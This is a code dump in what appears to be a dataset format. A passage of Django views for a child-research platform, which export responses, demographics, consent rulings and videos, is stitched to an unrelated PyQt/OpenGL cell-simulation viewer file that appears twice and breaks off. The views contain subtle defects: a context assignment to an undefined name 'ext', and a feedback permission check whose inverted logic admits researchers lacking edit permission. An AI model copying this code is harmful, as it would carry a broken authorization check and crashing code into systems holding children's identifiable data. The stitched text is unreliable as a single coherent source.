elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
continue
# Omit empty generatedProperties values from CSV
elif key == "generatedProperties" and not value:
continue
# For all other data, create a regular entry with frame_id and no event #
else:
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=key,
event_number="",
value=value,
)
)
return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
unique_frame_ids = set()
event_keys = set()
unique_frame_keys_dict = {}
for page_num in response_paginator.page_range:
page_of_responses = response_paginator.page(page_num)
for resp in page_of_responses:
this_resp_data = get_frame_data(resp)
these_ids = {
d.frame_id.partition("-")[2]
for d in this_resp_data
if not d.frame_id == "global"
}
event_keys = event_keys | {
d.key for d in this_resp_data if d.event_number != ""
}
unique_frame_ids = unique_frame_ids | these_ids
for frame_id in these_ids:
these_keys = {
d.key
for d in this_resp_data
if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
}
if frame_id in unique_frame_keys_dict:
unique_frame_keys_dict[frame_id] = (
unique_frame_keys_dict[frame_id] | these_keys
)
else:
unique_frame_keys_dict[frame_id] = these_keys
# Start with general descriptions of high-level headers (child_id, response_id, etc.)
writer.writerows(
[
{"column": header, "description": description}
for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
]
)
writer.writerow(
{
"possible_frame_id": "global",
"frame_description": "Data not associated with a particular frame",
}
)
# Add placeholders to describe each frame type
unique_frame_ids = sorted(list(unique_frame_ids))
for frame_id in unique_frame_ids:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
}
)
unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
for k in unique_frame_keys:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"possible_key": k,
"key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
}
)
event_keys = sorted(list(event_keys))
event_key_stock_descriptions = {
"eventType": (
"Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
"cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
"or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
"find a list of events recorded by each frame in the frame documentation at "
"https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
),
"exitType": (
"Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
),
"lastPageSeen": (
"Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
),
"pipeId": (
"Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
"useful for troubleshooting in rare cases."
),
"streamTime": (
"Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
"video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
),
"timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
"videoId": (
"Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
"currently being recorded."
),
}
for k in event_keys:
writer.writerow(
{
"possible_frame_id": "any (event data)",
"possible_key": k,
"key_description": event_key_stock_descriptions.get(
k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
),
}
)
def build_single_response_framedata_csv(response):
this_resp_data = get_frame_data(response)
output, writer = csv_namedtuple_writer(FrameDataRow)
writer.writerows(this_resp_data)
return output.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return study.responses_for_researcher(self.request.user).order_by(
self.get_ordering()
)
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return (
study.responses_for_researcher(self.request.user)
.order_by(self.get_ordering())
.select_related("child", "child__user", "study", "demographic_snapshot")
.values(
"uuid",
"date_created",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
"demographic_snapshot__uuid",
"demographic_snapshot__created_at",
"demographic_snapshot__number_of_children",
"demographic_snapshot__child_birthdays",
"demographic_snapshot__languages_spoken_at_home",
"demographic_snapshot__number_of_guardians",
"demographic_snapshot__number_of_guardians_explanation",
"demographic_snapshot__race_identification",
"demographic_snapshot__age",
"demographic_snapshot__gender",
"demographic_snapshot__education_level",
"demographic_snapshot__spouse_education_level",
"demographic_snapshot__annual_income",
"demographic_snapshot__number_of_books",
"demographic_snapshot__additional_comments",
"demographic_snapshot__country",
"demographic_snapshot__state",
"demographic_snapshot__density",
"demographic_snapshot__lookit_referrer",
"demographic_snapshot__extra",
)
)
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
template_name = "studies/study_responses.html"
def get_ordering(self):
orderby = self.request.GET.get("sort", "id")
return orderby.replace("id", "child__id").replace("status", "completed")
def get_queryset(self):
return (
super()
.get_queryset()
.prefetch_related(
"consent_rulings__arbiter",
Prefetch(
"feedback",
queryset=Feedback.objects.select_related("researcher").order_by(
"-id"
),
),
)
)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["study"] = study = self.study
paginated_responses = context["object_list"]
columns_included_in_summary = study.columns_included_in_summary()
columns_included_in_table = [
"child__hashed_id",
"response__uuid",
"response__id",
"response__status",
"response__completed",
"response__is_preview",
]
response_data = []
for resp in paginated_responses:
# Info needed for table display of individual responses
this_resp_data = {
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_table
}
# Exception - store actual date object for date created
this_resp_data["response__date_created"] = resp.date_created
# info needed for summary table shown at right
this_resp_data["summary"] = [
{
"name": col.name,
"value": col.extractor(resp),
"description": col.description,
}
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_summary
]
this_resp_data["videos"] = resp.videos.values("pk", "full_name")
for v in this_resp_data["videos"]:
v["display_name"] = (
v["full_name"]
.replace("videoStream_{}_".format(study.uuid), "...")
.replace("_{}_".format(resp.uuid), "...")
)
response_data.append(this_resp_data)
context["response_data"] = response_data
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
context["can_edit_feedback"] = self.request.user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
)
return context
def build_video_display_name(self, study_uuid, response_uuid, vid_name):
return ". . ." + ". . .".join(
vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
)
class StudySingleResponseDownload(ResponseDownloadMixin, View):
def get(self, *args, **kwargs):
data_type = self.request.GET.get("data-type-selector", None)
if data_type not in ["json", "csv", "framedata"]:
raise SuspiciousOperation
response_id = self.request.GET.get("response_id", None)
try:
resp = self.get_queryset().get(pk=response_id)
except ObjectDoesNotExist:
raise SuspiciousOperation
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
extension = "json" if data_type == "json" else "csv"
filename = "{}_{}{}.{}".format(
study_name_for_files(study.name),
str(resp.uuid),
"_frames"
if data_type == "json"
else "_identifiable"
if IDENTIFIABLE_DATA_HEADERS & header_options
else "",
extension,
)
if data_type == "json":
cleaned_data = json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t",
default=str,
)
elif data_type == "csv":
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
header_list = get_response_headers(header_options, row_data.keys())
output, writer = csv_dict_output_and_writer(header_list)
writer.writerow(row_data)
cleaned_data = output.getvalue()
elif data_type == "framedata":
cleaned_data = build_single_response_framedata_csv(resp)
else:
raise SuspiciousOperation
response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponseVideoAttachment(
ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
raise_exception = True
@cached_property
def video(self):
# Only select the video from consented videos for this study
return self.study.videos_for_consented_responses.get(
pk=self.kwargs.get("video")
)
def can_view_this_video(self):
user = self.request.user
study = self.study
video = self.video
return user.is_researcher and (
(
user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
and not video.response.is_preview
)
or (
user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
and video.response.is_preview
)
)
test_func = can_view_this_video
def get(self, request, *args, **kwargs):
video = self.video
download_url = video.download_url
if self.request.GET.get("mode") == "download":
r = requests.get(download_url)
response = FileResponse(
File.open(io.BytesIO(r.content)),
filename=video.filename,
as_attachment=True,
)
return response
return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
def user_can_edit_feedback(self):
user = self.request.user
study = self.study
# First check user has permission to be editing feedback from this study at all
if not user.is_researcher and user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, study
):
return False
# Check that the feedback_id (if given) is from this study
feedback_id = self.request.POST.get("feedback_id", None)
if feedback_id:
try:
feedback = Feedback.objects.get(id=feedback_id)
except ObjectDoesNotExist:
return False
if feedback.response.study_id != study.pk:
return False
# Check that the response_id (if given) is from this study
response_id = self.request.POST.get("response_id", None)
if response_id:
try:
response = Response.objects.get(id=int(response_id))
except ObjectDoesNotExist:
return False
if response.study_id != study.pk:
return False
return True
test_func = user_can_edit_feedback
def post(self, request, *args, **kwargs):
form_data = self.request.POST
user = self.request.user
study = self.study
feedback_id = form_data.get("feedback_id", None)
comment = form_data.get("comment", "")
if feedback_id:
Feedback.objects.filter(id=feedback_id).update(comment=comment)
else:
response_id = int(form_data.get("response_id"))
Feedback.objects.create(
response_id=response_id, researcher=user, comment=comment
)
return HttpResponseRedirect(
reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
)
class StudyResponsesConsentManager(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
generic.DetailView,
):
template_name = "studies/study_responses_consent_ruling.html"
queryset = Study.objects.all()
raise_exception = True
def user_can_code_consent(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and (
user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
)
test_func = user_can_code_consent
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Need to prefetch our responses with consent-footage videos.
study = context["study"]
# TODO: technically should not grant access to consent videos for preview data unless has that perm
# (or should clearly indicate that code_study_consent means preview + actual data)
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
responses = get_responses_with_current_rulings_and_videos(
study.id, preview_only
)
context["loaded_responses"] = responses
context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
# Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
response_key_value_store = {}
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for response in page_of_responses:
response_json = response_key_value_store[str(response["uuid"])] = {}
response["uuid"] = str(response.pop("uuid"))
response_json["videos"] = response.pop("videos")
response_json["details"] = {
"general": {
"uuid": response["uuid"],
"global_event_timings": json.dumps(
response.pop("global_event_timings")
),
"sequence": json.dumps(response.pop("sequence")),
"completed": json.dumps(response.pop("completed")),
"date_created": str(response["date_created"]),
},
"participant": {
"hashed_id": hash_participant_id(response),
"uuid": str(response.pop("child__user__uuid")),
"nickname": response.pop("child__user__nickname"),
},
"child": {
"hashed_id": hash_child_id(response),
"uuid": str(response.pop("child__uuid")),
"name": response.pop("child__given_name"),
"birthday": str(response.pop("child__birthday")),
"gender": response.pop("child__gender"),
"additional_information": response.pop(
"child__additional_information"
),
},
}
ext["response_key_value_store"] = json.dumps(response_key_value_store)
return context
def post(self, request, *args, **kwargs):
form_data = self.request.POST
user = self.request.user
study = self.get_object()
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
responses = study.responses
if preview_only:
responses = responses.filter(is_preview=True)
comments = json.loads(form_data.get("comments"))
for ruling in ("accepted", "rejected", "pending"):
judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
for response in judged_responses:
response.consent_rulings.create(
action=ruling,
arbiter=user,
comments=comments.pop(str(response.uuid), None),
)
response.save()
if comments:
for resp_uuid, comment in comments.items():
response = responses.get(uuid=resp_uuid)
response.consent_rulings.create(
action=response.most_recent_ruling, arbiter=user, comments=comment
)
return HttpResponseRedirect(
reverse(
"exp:study-responses-consent-manager",
kwargs=dict(pk=self.get_object().pk),
)
)
def get(self, request, *args, **kwargs):
if self.get_object().study_type.is_external:
messages.error(request, "There is no consent manager for external studies.")
return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
else:
return super().get(request, *args, **kwargs)
class StudyResponsesAll(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
template_name = "studies/study_responses_all.html"
queryset = Study.objects.all()
http_method_names = ["get"]
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_delete_preview_data"] = self.request.user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, context["study"]
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDeletePreviewResponses(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
SingleObjectMixin,
View,
):
queryset = Study.objects.all()
def user_can_delete_preview_data(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and user.has_study_perms(
StudyPermission.DELETE_ALL_PREVIEW_DATA, study
)
test_func = user_can_delete_preview_data
def post(self, request, *args, **kwargs):
study = self.get_object()
preview_responses = study.responses.filter(is_preview=True).prefetch_related(
"videos", "responselog_set", "consent_rulings", "feedback"
)
paginator = Paginator(preview_responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
resp.delete()
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs={"pk": study.id})
)
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
# responses in memory
paginate_by = 1
def make_chunk(self, paginator, page_num, header_options):
chunk = ""
if page_num == 1:
chunk = "[\n"
chunk += ",\n".join(
json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t", # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
default=str,
)
for resp in paginator.page(page_num)
)
if page_num == paginator.page_range[-1]:
chunk += "\n]"
else:
chunk += ",\n"
return chunk
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
filename = "{}_{}.json".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = StreamingHttpResponse(
(
self.make_chunk(paginator, page_num, header_options)
for page_num in paginator.page_range
),
content_type="text/json",
)
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
headers = set()
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
# Add any new headers from this session
headers = headers | row_data.keys()
session_list.append(row_data)
header_options = set(self.request.GET.getlist("data_options"))
header_list = get_response_headers(header_options, headers)
output, writer = csv_dict_output_and_writer(header_list)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name),
"all-responses"
+ ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
def build_summary_dict_csv(self, optional_headers_selected_ids):
descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
header_list = get_response_headers(
optional_headers_selected_ids, descriptions.keys()
)
all_descriptions = [
{"column": header, "description": descriptions[header]}
for header in header_list
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
header_options = self.request.GET.getlist("data_options")
cleaned_data = self.build_summary_dict_csv(header_options)
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-responses-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
child_list = []
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
}
)
if row_data["child__global_id"] not in child_list:
child_list.append(row_data["child__global_id"])
session_list.append(row_data)
output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-identifiable"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
def build_child_dict_csv(self):
all_descriptions = [
{"column": col.id, "description": col.description}
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
cleaned_data = self.build_child_dict_csv()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
# TODO: with large files / many responses generation can take a while. Should generate asynchronously along
# with the data dict.
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
if study.study_type.is_external:
messages.error(
self.request, "Frame data is not available for External Studies."
)
return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
zipped_file = io.BytesIO() # import io
with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
data = build_single_response_framedata_csv(resp)
filename = "{}_{}_{}.csv".format(
study_name_for_files(study.name), resp.uuid, "frames"
)
zipped.writestr(filename, data)
zipped_file.seek(0)
response = FileResponse(
zipped_file,
as_attachment=True,
filename="{}_framedata_per_session.zip".format(
study_name_for_files(study.name)
),
)
return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
def get(self, request, *args, **kwargs):
study = self.study
if study.study_type.is_external:
messages.error(
request, "Frame data dictionary is not available for external studies"
)
else:
filename = "{}_{}_{}".format(
study_name_for_files(study.name), study.uuid, "all-frames-dict"
)
build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
messages.success(
request,
f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs=self.kwargs)
)
class StudyDemographics(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
template_name = "studies/study_demographics.html"
queryset = Study.objects.all()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
study = self.study
header_options = self.request.GET.getlist("demo_options")
json_responses = []
paginator = context["paginator"]
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
json_responses.append(
json.dumps(
construct_response_dictionary(
resp,
DEMOGRAPHIC_COLUMNS,
header_options,
include_exp_data=False,
),
indent="\t",
default=str,
)
)
cleaned_data = f"[ {', '.join(json_responses)} ]"
filename = "{}_{}.json".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/json")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
study = self.study
paginator = context["paginator"]
header_options = set(self.request.GET.getlist("demo_options"))
participant_list = []
headers_for_download = get_demographic_headers(header_options)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
participant_list.append(row_data)
output, writer = csv_dict_output_and_writer(headers_for_download)
writer.writerows(participant_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
def render_to_response(self, context, **response_kwargs):
header_options = set(self.request.GET.getlist("demo_options"))
headers_for_download = get_demographic_headers(header_options)
all_descriptions = [
{"column": col.id, "description": col.description}
for col in DEMOGRAPHIC_COLUMNS
if col.id in headers_for_download
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
def get(self, request, *args, **kwargs):
study = self.study
responses = (
study.consented_responses.order_by("id")
.select_related("child", "child__user", "study")
.values(
"uuid",
"child__uuid",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
)
)
child_dict = {}
account_dict = {}
collision_text = ""
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
participant_hashed_id = hash_participant_id(resp)
participant_global_id = resp["child__user__uuid"]
child_hashed_id = hash_child_id(resp)
child_global_id = resp["child__uuid"]
if participant_hashed_id in account_dict:
if participant_global_id != account_dict[participant_hashed_id]:
collision_text += "Participant hashed ID {} ({}, {})\n".format(
participant_hashed_id,
account_dict[participant_hashed_id],
participant_global_id,
)
else:
account_dict[participant_hashed_id] = participant_global_id
if child_hashed_id in child_dict:
if child_global_id != child_dict[child_hashed_id]:
collision_text += "Child hashed ID {} ({}, {})<br>".format(
child_hashed_id,
child_dict[child_hashed_id],
child_global_id,
)
else:
child_dict[child_hashed_id] = child_global_id
return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
template_name = "studies/study_attachments.html"
model = Video
paginate_by = 100
def get_ordering(self):
return self.request.GET.get("sort", "-created_at") or "-created_at"
def get_queryset(self):
study = self.study
videos = study.videos_for_consented_responses
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, study
):
videos = videos.filter(response__is_preview=True)
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, study
):
videos = videos.filter(response__is_preview=False)
match = self.request.GET.get("match", "")
if match:
videos = videos.filter(full_name__icontains=match)
return videos.order_by(self.get_ordering())
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["match"] = self.request.GET.get("match", "")
context["study"] = self.study
return context
def post(self, request, *args, **kwargs):
match = self.request.GET.get("match", "")
study = self.study
if self.request.POST.get("all-attachments"):
build_zipfile_of_videos.delay(
f"{study.uuid}_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=False,
)
messages.success(
request,
f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
if self.request.POST.get("all-consent-videos"):
build_zipfile_of_videos.delay(
f"{study.uuid}_consent_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=True,
)
messages.success(
request,
f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-attachments", kwargs=self.kwargs)
)
| true | true |
f72edc7d2c194fe94d3f029b4088fafe7afdce75 | 3,944 | py | Python | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
selectedCell = pyqtSignal(str)#CellState, name='selectedCell')
selectedName = -1
dt = 0.25
def __init__(self, parent = None):
PyGLWidget.__init__(self,parent)
self.animTimer = QTimer()
self.animTimer.timeout.connect(self.animate)
self.renderInfo = None
self.sim= None
self.modfile = None
self.record = False
self.set_radius(32)
self.frameNo = 0
def help(self):
pass
def setSimulator(self, sim):
self.sim = sim
@pyqtSlot(bool)
def toggleRun(self, run):
if run:
self.animTimer.start(0)
else:
self.animTimer.stop()
@pyqtSlot(bool)
def toggleRecord(self, rec):
self.record = rec
self.sim.savePickle = rec
@pyqtSlot()
def reset(self):
self.sim = Simulator(self.modname, self.dt)
#if self.sim:
# self.sim.reset()
self.frameNo = 0
@pyqtSlot()
def load(self):
qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
self.modfile = str(qs)
self.loadFile(self.modfile)
def loadFile(self, modstr):
(path,name) = os.path.split(modstr)
modname = str(name).split('.')[0]
self.modname = modname
sys.path.append(path)
if self.sim:
self.sim.reset(modname)
else:
self.sim = Simulator(modname, self.dt)
#self.draw()
self.paintGL()
def animate(self):
if self.sim:
self.sim.step()
self.updateSelectedCell()
self.frameNo += 1
if self.record:
if (self.frameNo%5)==0:
self.setSnapshotCounter(self.frameNo)
self.saveSnapshot()
def updateSelectedCell(self):
if self.sim:
states = self.sim.cellStates
cid = self.selectedName
txt = ''
if states.has_key(cid):
s = states[cid]
for (name,val) in s.__dict__.items():
if name not in CellState.excludeAttr:
vals = str(val)
#if len(vals)>6: vals = vals[0:6]
txt = txt + name + ': ' + vals + '\n'
self.selectedCell.emit(txt)
if self.sim.stepNum%100==0:
self.updateGL()
def postSelection(self, name):
self.selectedName = name
self.updateSelectedCell()
def paintGL(self):
PyGLWidget.paintGL(self)
glClearColor(0.5,0.5,0.5,0.0)
glClear(GL_COLOR_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
#s = self.renderInfo.scale
#glScalef(s,s,s)
if self.sim:
for r in self.sim.renderers:
if r != None:
r.render_gl(self.selectedName)
glPopMatrix()
def drawWithNames(self):
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
#s = self.renderInfo.scale
#glScalef(s,s,s)
if self.sim:
for r in self.sim.renderers:
if r:
r.renderNames_gl()
glPopMatrix()
class RenderInfo:
def __init__(self):
self.renderers = []
self.scale = 1.0
def addRenderer(self, renderer):
self.renderers.append(renderer)
def reset(self):
self.renderers = []
self.scale = 1.0
def setScale(self, s):
self.scale = s
| 26.648649 | 86 | 0.556288 | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
selectedCell = pyqtSignal(str)
selectedName = -1
dt = 0.25
def __init__(self, parent = None):
PyGLWidget.__init__(self,parent)
self.animTimer = QTimer()
self.animTimer.timeout.connect(self.animate)
self.renderInfo = None
self.sim= None
self.modfile = None
self.record = False
self.set_radius(32)
self.frameNo = 0
def help(self):
pass
def setSimulator(self, sim):
self.sim = sim
@pyqtSlot(bool)
def toggleRun(self, run):
if run:
self.animTimer.start(0)
else:
self.animTimer.stop()
